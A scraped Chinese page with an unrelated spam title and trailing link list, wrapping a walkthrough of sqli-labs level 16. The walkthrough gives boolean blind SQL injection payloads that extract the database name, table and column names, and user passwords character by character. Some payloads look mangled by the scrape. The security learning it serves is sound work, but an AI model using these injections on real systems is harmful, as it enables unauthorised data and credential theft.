当前位置: 首页 > news >正文

html视频网站模板百度手机助手安卓版

news 2026/1/1 20:26:44
html视频网站模板,百度手机助手安卓版,注册一个网页多少钱,关于门户网站建设讲话文章目录 前言一、回顾上一关知识点二、靶场第十六关通关思路1、判断注入点2、猜数据库长度3、猜数据库名字4、猜表名长度5、猜表名名字6、猜列名长度7、猜列名名字8、猜数据长度9、猜数据名字 总结 前言 此文章只用于学习和反思巩固sql注入知识#xff0c;禁止用于做非法攻击… 文章目录 前言一、回顾上一关知识点二、靶场第十六关通关思路1、判断注入点2、猜数据库长度3、猜数据库名字4、猜表名长度5、猜表名名字6、猜列名长度7、猜列名名字8、猜数据长度9、猜数据名字 总结 前言 此文章只用于学习和反思巩固sql注入知识禁止用于做非法攻击。注意靶场是可以练习的平台不能随意去尚未授权的网站做渗透测试 一、回顾上一关知识点 上一关是典型的布尔盲注是单引号闭合。这一关是)闭合。 二、靶场第十六关通关思路 1、判断注入点2、猜数据库长度3、猜数据库名字4、猜表名长度5、猜表名名字6、猜列名长度7、猜列名名字8、猜数据长度9、猜数据名字 1、判断注入点 这一关和上一关唯一不同的就是闭合不同我们一个个试就行。一般都是单引号、双引号或者引号和括号混合。 注入语句为 1 or 11 1 or 12 发现没有反应再试试 1 or 11#1 or 12#经过不断尝试payload为 1) or 11#1) or 12#2、猜数据库长度 注入语句为 1) or length(database())7#发现数据库长度大于7页面登录成功大于8登录失败 3、猜数据库名字 注入语句为 1) or ascii(substr(database(),1,1))114#(如图所示)发现大于114正常大于115页面false状态。所以数据库名第一个字符ascii码为115通过ascii码查询发现是字符’s’。我们要重复此操作八次才能猜出数据库名方法和上面一样就是把substr(database(),2,1)一直递增到8最后得到数据库名为security 4、猜表名长度 注入语句为 1) or length((select table_name from information_schema.tables where table_schemadatabase() limit 0,1))5#发现第一个数据库表名大于5页面正常大于6页面false状态。(如图所示) 通过limit 0,1递增标注数字猜其他表名长度。 得到第一个表名长6第二个表名长8第三个表名长6第四个长度表名长5 5、猜表名名字 1) or ascii(substr((select table_name from information_schema.tables where table_schemadatabase() limit 3,1),1,1))116#(如图所示)发现第四个表名第一个字符ascii码大于116正常大于117页面false得到第四个表名第一个字符ascii码为117说明是字符’u’ 通过substr(表名,1,1)递增标注数字到5猜出此表名名字为users 6、猜列名长度 注入语句为 1) or (length((select column_name from information_schema.columns where table_schemadatabase() and table_nameuserslimit 0,1)))1#(如图所示)猜出第一个列名长度大于1页面正常大于2页面false所以第一个列名长2。以此类推递增limit得到所有列名长度(略)。第二个列名长8第三个列名长8。 7、猜列名名字 注入语句为 1) or ascii(substr((select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 1,1),1,1))116# 猜到第二个列名第一个字符大于116正常大于117页面false。通过substr(列名,1,1) 和limit 0,1不断递增标识数字查出所有列名名字。这里只演示了一个列名。得到usernamepassword列名。 8、猜数据长度 注入语句为 1) or length((select password from users limit 0,1))3#(如图所示)猜出第一个密码长度大于3正常大于4页面false。以此类推查所有数据长度。方法和上面一样就不展示了 9、猜数据名字 注入语句为 1) or ascii(substr((select password from users limit 0,1),1,1))67#(如图所示)猜出密码第一个字符大于67正常大于68页面false。以此类推猜出所有数据名字。 总结 这一关和上一关差不多只是闭合方式不同。此文章是小白自己为了巩固sql注入而写的大佬路过请多指教
http://www.w-s-a.com/news/802713/

相关文章:

  • 销售公司怎么做网站删除wordpress
  • 毕节网站怎么做seohtml代码特效银河系
  • 淄博品质网站建设网站引导页案例
  • 网站建设虚拟空间小豹子韬韬是哪个网站做的
  • 网络司网站如何建立公司网站建议和规则
  • 织梦网站模板后台密码找回企业vi设计公司性价比高
  • php 爬取网站所有链接传奇手游发布网站
  • 免费软文网站wordpress中文名注册
  • 企业网站建设研究目的意义怎样设计一个公司网站
  • 怎么架构网站便民信息发布平台
  • 网站 建设 现状网站推广合同需要缴纳印花税吗
  • 熊猫头表情包制作网站wordpress 缺省目录
  • 网站浏览图片怎么做的群晖wordpress升级5.0
  • 25个优秀个人网站设计模板网站建设定位分析论文
  • 在线网站备案站长seo综合查询工具
  • 网站根 html网站建设行业数据
  • 网站公司做的网站有最字设计说明室内设计
  • 在线网站代码生成我想做个百度网站怎么做
  • 网站的建设费用分为长治市建设厅官方网站
  • 做网站都有哪些费用建设免费手机网站
  • 网站 组成代码做网站图片怎么插
  • 2020中国企业500强榜单南宁seo标准
  • 北美购物网站排名烟台专业的网站建站公司
  • 门户网站设计特点营销策划咨询机构
  • 天津做网站就到徽信xiala5中国营销型网站
  • 外汇网站建设制作深圳三站合一网站建设
  • 深圳坂田网站设计公司有哪些学校网站建设管理办法
  • 太原建设银行网站中山营销型网站设计
  • 广东省建设厅官方网站多少钱江苏省江建集团有限公司建设网站
  • 网站开发主流服装网站开发课程设计